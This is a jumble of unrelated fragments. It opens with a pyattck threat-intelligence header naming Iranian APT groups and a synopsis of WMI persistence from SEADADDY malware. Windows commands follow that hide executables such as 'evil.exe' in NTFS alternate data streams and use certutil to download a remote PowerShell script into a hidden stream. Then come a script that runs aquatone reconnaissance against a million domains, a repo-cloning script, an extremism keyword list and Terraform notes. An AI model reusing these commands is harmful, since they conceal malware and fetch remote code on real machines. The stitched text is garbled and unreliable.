The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
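#!/bin/bash
# Clone every repository starred by $user.
user="CHANGEME"
# Last page number from the Link header (header name matched case-insensitively;
# empty when the result fits on a single page).
pages=$(curl -sI "https://api.github.com/users/$user/starred" | sed -nr 's/^Link:.*page=([0-9]+).*/\1/Ip')
# GitHub pages are numbered from 1; fall back to one page when no Link header was returned.
for page in $(seq 1 "${pages:-1}"); do
  curl -s "https://api.github.com/users/$user/starred?page=$page&per_page=100" | jq -r '.[].html_url' |
  while read -r rp; do
    git clone "$rp"
  done
done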
#!/bin/bash
echo " ______ ______ ______ __ ______ ______ __ __ ______ __ __
/\__ _\ /\ __ \ /\ __ \ /\ \ /\ == \ /\ __ \ /\_\_\_\ /\ ___\ /\ \_\ \
\/_/\ \/ \ \ \/\ \ \ \ \/\ \ \ \ \____ \ \ __< \ \ \/\ \ \/_/\_\/_ \ \___ \ \ \ __ \
\ \_\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ /\_\/\_\ \/\_____\ \ \_\ \_\
\/_/ \/_____/ \/_____/ \/_____/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/_/\/_/ "
echo ""
#!/bin/bash
wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
for l in `cat top-1m.csv | cut -d',' -f2`
do
aquatone-discover -d $l --threads 90
done
4chan
activis*
allah
alpha
alt-right*
anarchis*
anita sarkeesian
arian
aryan
Auschwitz
Recently I had to teach myself some Terraform for real, and it hit me - Docker (which I have come to use extensively) would be a perfect environment in which to do this.
Before you begin, make sure you have Terraform installed:
$ brew install terraform
----- Interested Reads------
+ Interesting Read (Serverless Architecture of Acloud guru)
https://read.acloud.guru/serverless-the-future-of-software-architecture-d4473ffed864
----- Getting Started-------
+ Requirements
+ AWS Free Tier Account
+ PC with putty and putty keygen/ Mac
+ Optional
+ iOS/Android App $20